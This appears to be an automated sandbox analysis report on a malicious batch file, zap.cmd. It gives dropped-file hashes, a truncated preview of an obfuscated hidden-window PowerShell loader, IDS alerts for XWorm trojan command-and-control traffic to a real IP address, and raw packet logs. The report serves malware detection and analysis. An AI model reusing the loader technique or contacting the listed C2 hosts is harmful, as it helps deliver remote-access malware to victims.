                                                                                  SHA-512:11C49519360638895E0A3CDA651D9AE56CC787BFB3BDD26076ED83A686DF82642902CB0899A552CD396EFF7F882949D422361063153DCFDC7A1D7766586103C3
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:@...e...................................(............@..........
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):489216
                                                                                  Entropy (8bit):5.935106757254994
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:XxxLpZqkQSRcQZg5nN94/iNzk5NKanAeDH:XsjJN9fNA5N/hH
                                                                                  MD5:E6ECB4577C73A32DC43D8D01CC10CADB
                                                                                  SHA1:86D431761162D03713D45BFFF6ACCD0D23411775
                                                                                  SHA-256:C003AC50DA0EFA115BFEAAEA28F7BEF37DF720AAD045C1FE8BD8EDE0E3DE7554
                                                                                  SHA-512:9B8ED24618E83B3B067FE1490F7F6F0FD50FE5F7973624300D463107150A6E2D1D6C2BC3B5D6535F563B3A5B29994E0C7EAE5B49DED9F12A67341D593836DA07
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6224
                                                                                  Entropy (8bit):3.733476767572627
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:EVDEllDtgC3CyyU2UjIukvhkvklCywS0JojlHJYSogZoqUJojlLYSogZoe1:+vC3CQTNkvhkvCCtPJojZHUJojfHR
                                                                                  MD5:142E28218F4AB0A46B51ABFE61796679
                                                                                  SHA1:E08B465F1669AD362D043EE338D05EFDF4EE246A
                                                                                  SHA-256:8252B995B2FA49487A56E34B1491EBAB210B30942FDFDC6313BA0B972952CB10
                                                                                  SHA-512:2433FC1A9EB9A6BA9CA9C9D9E01DE7CFA4889B3B635EF45D91450E4967E585C0FFFEB725751CB6149896265FD7ED208E58227146A7C37999351584C5EB81B8F7
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...J.S...C...E...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...A ..E...@...E.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.............................^.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......EW<2.X....../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.X|.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.X|.....2.........................W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.X|.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.X|.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.X......u...........
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6224
                                                                                  Entropy (8bit):3.733476767572627
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:EVDEllDtgC3CyyU2UjIukvhkvklCywS0JojlHJYSogZoqUJojlLYSogZoe1:+vC3CQTNkvhkvCCtPJojZHUJojfHR
                                                                                  MD5:142E28218F4AB0A46B51ABFE61796679
                                                                                  SHA1:E08B465F1669AD362D043EE338D05EFDF4EE246A
                                                                                  SHA-256:8252B995B2FA49487A56E34B1491EBAB210B30942FDFDC6313BA0B972952CB10
                                                                                  SHA-512:2433FC1A9EB9A6BA9CA9C9D9E01DE7CFA4889B3B635EF45D91450E4967E585C0FFFEB725751CB6149896265FD7ED208E58227146A7C37999351584C5EB81B8F7
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...J.S...C...E...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...A ..E...@...E.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.............................^.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......EW<2.X....../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.X|.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.X|.....2.........................W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.X|.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.X|.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.X......u...........
File type:ASCII text, with very long lines (6229), with no line terminators
Entropy (8bit):5.242308669741453
TrID:
File name:zap.cmd
File size:6'229 bytes
MD5:5521519d477ec8b95c87ad7ffc115145
SHA1:551da12ea131d7bf60646a35cfcd8a3a16905f94
SHA256:3a399d16db8e57cf727a03f4d9ad33624c08571c0f0b2e4120095e4622c22e19
SHA512:46afb8d1b705d1d380b739898a74be66593b04adb9d27f3cacfdfe16c896ee08579e5c1aea410fbdb4c5116987f99e0ed9396b35f6761dbab48eeef1d425f96f
SSDEEP:96:JQyAIf/tbpCJ5gEpH6SpLiF2gzfTUOTgdGw9kVFVZM2jX3lQFgUXJYIpwsz:9ntb0S2uIOeD9kVFVZM2r8BX+M
TLSH:54D17E9C7727F2A480843372ECBDAE342B51461705A28D56C7567E2E72C46DDB22CF5C
File Content Preview:start /min powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrk
Icon Hash:9686878b929a9886
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/23/24-21:14:15.572246 | TCP | 2852923 | ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
05/23/24-21:14:15.571396 | TCP | 2852870 | ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
05/23/24-21:13:17.087470 | TCP | 2855924 | ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
05/23/24-21:14:05.945641 | TCP | 2852874 | ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    May 23, 2024 21:12:15.746356964 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.746536016 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.746536016 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.746547937 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.746602058 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.753276110 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.753298044 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.753420115 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.753437042 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.753494978 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.827153921 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.827191114 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.827301025 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.827316999 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.827392101 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.827392101 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.838725090 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.838742971 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.838970900 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.838998079 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.839482069 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.844374895 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.844391108 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.844471931 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.844484091 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.844582081 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.851392984 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.851418972 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.851548910 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.851560116 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.851820946 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.855089903 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.855108023 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.855287075 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.855297089 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.855776072 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.861567020 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.861584902 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.861928940 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.861938953 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.862088919 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.867062092 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.867084026 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.867192030 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.867199898 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.867268085 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.916250944 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.916271925 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.916670084 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.916670084 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.916698933 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.917340994 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.920783997 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.920800924 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.922499895 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.922513962 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.922585964 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.925210953 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.925229073 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.925380945 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.925399065 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.925508022 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.928824902 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.928842068 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.930504084 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.930525064 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.930681944 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.932612896 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.932637930 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.933584929 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.933584929 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.933605909 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.934261084 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.935866117 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.935883045 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.936054945 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.936054945 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.936065912 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.936795950 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.938919067 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.938935995 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.939313889 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.939335108 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.939471960 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.941682100 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.941700935 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.942501068 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.942501068 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.942508936 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.942579031 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.010055065 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.010077953 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.010284901 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.010304928 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.010448933 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.013128042 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.013154984 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.013226032 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.013241053 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.013252020 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.014245987 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.015995026 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.016014099 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.016129017 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.016129017 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.016139030 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.016619921 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.019459009 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.019476891 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.019526005 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.019532919 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.019567966 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.019567966 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.020802021 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.020819902 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.020941973 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.020950079 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.022782087 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.023215055 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.023233891 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.023569107 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.023569107 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.023577929 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.025162935 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.025198936 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.025437117 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.025437117 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.025448084 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.025789022 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.027703047 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.027719021 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.028001070 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.028012037 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.030791998 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.107316017 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.107356071 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.107425928 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.107980967 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.107980967 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.107980967 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:54.523184061 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:54.523238897 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:54.523329973 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:54.536477089 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:54.536498070 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.035041094 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.035209894 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.101843119 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.101872921 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.102159023 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.102224112 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.106045008 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.150502920 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.423847914 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.423919916 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.423945904 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.423964024 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.423993111 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.424022913 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.429106951 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.429131031 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.479577065 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:55.479625940 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:55.479703903 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:55.480171919 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:55.480186939 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.160120964 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.160217047 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.172408104 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.172431946 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.172682047 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.174936056 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.175265074 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.218517065 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.423201084 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.423228025 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.423269987 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.423357964 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.423388958 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.423413992 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.423440933 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.446820021 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.446856022 CEST4434972169.31.136.17192.168.2.6
May 23, 2024 21:12:56.446971893 CEST | 49721 | 443 | 192.168.2.6 | 69.31.136.17
May 23, 2024 21:12:56.447001934 CEST | 443 | 49721 | 69.31.136.17 | 192.168.2.6
May 23, 2024 21:12:56.447022915 CEST | 49721 | 443 | 192.168.2.6 | 69.31.136.17
May 23, 2024 21:12:56.447048903 CEST | 49721 | 443 | 192.168.2.6 | 69.31.136.17
May 23, 2024 21:12:56.450154066 CEST | 443 | 49721 | 69.31.136.17 | 192.168.2.6
May 23, 2024 21:12:56.450239897 CEST | 443 | 49721 | 69.31.136.17 | 192.168.2.6
May 23, 2024 21:12:56.450265884 CEST | 49721 | 443 | 192.168.2.6 | 69.31.136.17
May 23, 2024 21:12:56.450292110 CEST | 49721 | 443 | 192.168.2.6 | 69.31.136.17
May 23, 2024 21:12:56.458343983 CEST | 49721 | 443 | 192.168.2.6 | 69.31.136.17
May 23, 2024 21:12:56.458379030 CEST | 443 | 49721 | 69.31.136.17 | 192.168.2.6
May 23, 2024 21:12:56.458398104 CEST | 49721 | 443 | 192.168.2.6 | 69.31.136.17
May 23, 2024 21:12:56.458739042 CEST | 49721 | 443 | 192.168.2.6 | 69.31.136.17
May 23, 2024 21:13:04.824142933 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:04.840533018 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:04.840625048 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:05.181579113 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:05.186736107 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:05.961226940 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:06.014358044 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:17.087470055 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:17.092504978 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:17.303709030 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:17.306169033 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:17.394809008 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:28.984081984 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:28.994693995 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:29.167359114 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
